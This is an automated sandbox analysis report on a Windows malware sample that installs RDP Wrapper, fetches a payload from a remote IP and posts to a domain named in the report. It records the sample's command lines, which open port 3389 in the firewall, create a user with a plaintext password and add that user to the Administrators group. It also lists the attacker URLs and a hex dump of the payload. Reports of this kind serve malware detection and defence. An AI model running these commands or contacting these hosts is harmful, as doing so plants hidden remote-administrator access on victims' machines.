Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
Analysis ID:1528587
MD5:5057d16e9fb573fb3924b9c3dba53260
SHA1:ea177b2f35ca01d2e128bd876e56a548c3f69007
SHA256:06e0a0da4cabec34eeb742c985b969260256aa15b50e14fddcc12eee7ac52fd2
Tags:exe
Infos:

Detection

RDPWrap Tool
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a new user with administrator rights
Allows multiple concurrent remote connection
Enables remote desktop connection
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Sigma detected: RDP Sensitive Settings Changed
Uses netsh to modify the Windows network and firewall settings
Yara detected RDPWrap Tool
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: New User Created Via Net.EXE
Spawns drivers
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe (PID: 6468 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe" MD5: 5057D16E9FB573FB3924B9C3DBA53260)
    • cmd.exe (PID: 6892 cmdline: "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RDPWInst.exe (PID: 7052 cmdline: C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i MD5: C213162C86BB943BCDF91B3DF381D2F6)
        • netsh.exe (PID: 4464 cmdline: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • cmd.exe (PID: 6972 cmdline: "cmd.exe" /c net user RDPUser_217d5074 DUF6g)aA2aiB /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 6964 cmdline: net user RDPUser_217d5074 DUF6g)aA2aiB /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 6980 cmdline: C:\Windows\system32\net1 user RDPUser_217d5074 DUF6g)aA2aiB /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 7088 cmdline: "cmd.exe" /c net localgroup MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 6892 cmdline: net localgroup MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 6972 cmdline: C:\Windows\system32\net1 localgroup MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 7032 cmdline: "cmd.exe" /c net localgroup "Administrators" RDPUser_217d5074 /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 6964 cmdline: net localgroup "Administrators" RDPUser_217d5074 /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 7088 cmdline: C:\Windows\system32\net1 localgroup "Administrators" RDPUser_217d5074 /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • WerFault.exe (PID: 7056 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6468 -s 2488 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • rdpdr.sys (PID: 4 cmdline: MD5: 64991B36F0BD38026F7589572C98E3D6)
  • tsusbhub.sys (PID: 4 cmdline: MD5: CC6D4A26254EB72C93AC848ECFCFB4AF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
    C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        00000003.00000000.1688644177.0000000000401000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
            00000003.00000000.1688700085.0000000000450000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
              Process Memory Space: RDPWInst.exe PID: 7052JoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                3.2.RDPWInst.exe.400000.0.unpackJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
                  3.2.RDPWInst.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    3.0.RDPWInst.exe.400000.0.unpackJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
                      3.0.RDPWInst.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: RDP Sensitive Settings Changed
                        Source: Registry Key setAuthor: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali: Data: Details: %ProgramFiles%\RDP Wrapper\rdpwrap.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, ProcessId: 7052, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll
                        Sigma detected: Execution of Suspicious File Type Extension
                        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\rdpvideominiport.sys, NewProcessName: C:\Windows\System32\drivers\rdpvideominiport.sys, OriginalFileName: C:\Windows\System32\drivers\rdpvideominiport.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: rdpvideominiport.sys
                        Sigma detected: New User Created Via Net.EXE
                        Source: Process startedAuthor: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: net user RDPUser_217d5074 DUF6g)aA2aiB /add, CommandLine: net user RDPUser_217d5074 DUF6g)aA2aiB /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user RDPUser_217d5074 DUF6g)aA2aiB /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6972, ParentProcessName: cmd.exe, ProcessCommandLine: net user RDPUser_217d5074 DUF6g)aA2aiB /add, ProcessId: 6964, ProcessName: net.exe
                        Sigma detected: Net.exe Execution
                        Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user RDPUser_217d5074 DUF6g)aA2aiB /add, CommandLine: net user RDPUser_217d5074 DUF6g)aA2aiB /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user RDPUser_217d5074 DUF6g)aA2aiB /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6972, ParentProcessName: cmd.exe, ProcessCommandLine: net user RDPUser_217d5074 DUF6g)aA2aiB /add, ProcessId: 6964, ProcessName: net.exe

                        Suricata Signatures

                        No Suricata rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Multi AV Scanner detection for domain / URL
                        Source: yalubluseks.euVirustotal: Detection: 12%Perma Link
                        Source: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exeVirustotal: Detection: 22%Perma Link
                        Source: http://147.45.44.104Virustotal: Detection: 20%Perma Link
                        Source: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exePVirustotal: Detection: 19%Perma Link
                        Source: http://yalubluseks.euVirustotal: Detection: 12%Perma Link
                        Multi AV Scanner detection for dropped file
                        Source: C:\Program Files\RDP Wrapper\rdpwrap.dllReversingLabs: Detection: 54%
                        Source: C:\Program Files\RDP Wrapper\rdpwrap.dllVirustotal: Detection: 56%Perma Link
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeReversingLabs: Detection: 68%
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeVirustotal: Detection: 77%Perma Link
                        Multi AV Scanner detection for submitted file
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeReversingLabs: Detection: 44%
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeVirustotal: Detection: 58%Perma Link
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP WrapperJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to behavior
                        Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.4:49733 version: TLS 1.2
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: \??\C:\Windows\symbols\exe\RDPCreator.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3520024706.0000000006CD0000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.pdb` source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.000000000128C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdbRSDS source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.00000000030AF000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: n0C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3516600470.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.Configuration.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: rdpclip.pdb source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: RfxVmt.pdbGCTL source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.3.dr
                        Source: Binary string: 00000000000000000400000000000000.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3520024706.0000000006CD0000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Configuration.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: RDPCreator.pdbH source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: \??\C:\Windows\System.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.000000000128C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbI source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.0000000001283000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Configuration.pdbt source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Core.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, WER7437.tmp.dmp.27.dr
                        Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr
                        Source: Binary string: C:\Users\Scarrled\Desktop\test\RDPCreator\RDPCreator\obj\Release\RDPCreator.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                        Source: Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.000000000128C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: RfxVmt.pdb source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.3.dr
                        Source: Binary string: System.Core.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Xml.pdb8 source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: RDPCreator.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.ni.pdb source: WER7437.tmp.dmp.27.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER7437.tmp.dmp.27.dr
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_004092D8 FindFirstFileW,FindClose,3_2_004092D8
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0040F73C FindFirstFileW,FindClose,3_2_0040F73C
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_00408EB9 lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,3_2_00408EB9

                        Networking

                        barindex
                        Yara detected RDPWrap Tool
                        Source: Yara matchFile source: 3.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000000.1688700085.0000000000450000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: RDPWInst.exe PID: 7052, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 01:30:54 GMTContent-Type: application/octet-streamContent-Length: 1785344Last-Modified: Thu, 26 Sep 2024 12:36:03 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f55533-1b3e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 1b 00 00 04 00 00 17 f6 1b 00 03 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 f8 12 00 00 00 60 05 00 ed 7b 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 fc 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 c3 04 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 12 04 00 00 10 00 00 00 14 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 7c 1e 00 00 00 30 04 00 00 20 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 50 04 00 00 14 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 c0 4f 00 00 00 70 04 00 00 00 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 f8 12 00 00 00 c0 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 04 00 00 00 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 04 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 5e 00 00 00 00 05 00 00 60 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 ed 7b 16 00 00 60 05 00 00 7c 16 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 70 17 00 00 00 00 00 00 cc 16 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: POST /get_rdp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 58Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                        Source: Joe Sandbox ViewIP Address: 147.45.44.104 147.45.44.104
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0043CF60 InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,3_2_0043CF60
                        Source: global trafficHTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                        Source: global trafficDNS traffic detected: DNS query: yalubluseks.eu
                        Source: unknownHTTP traffic detected: POST /get_rdp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 58Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:31:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Content-Type-Options: nosniffCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2FKkLmw5gyBr4YabzhAfntmQOBN4gs9Zy3Gu%2FXTQ6JKGe%2BM33xdwjMT4URkPeSiBDFA23xNqelbUVVPlotDBaqFDOJ1kC8GQu%2Bxm0pAVDFWJY16LqLuf3LiKgWlUyj74Zg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8cf25e731d8c7cfc-EWR92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeString found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exeP
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeString found in binary or memory: http://api.ipify.org
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000307D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000307D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgd
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
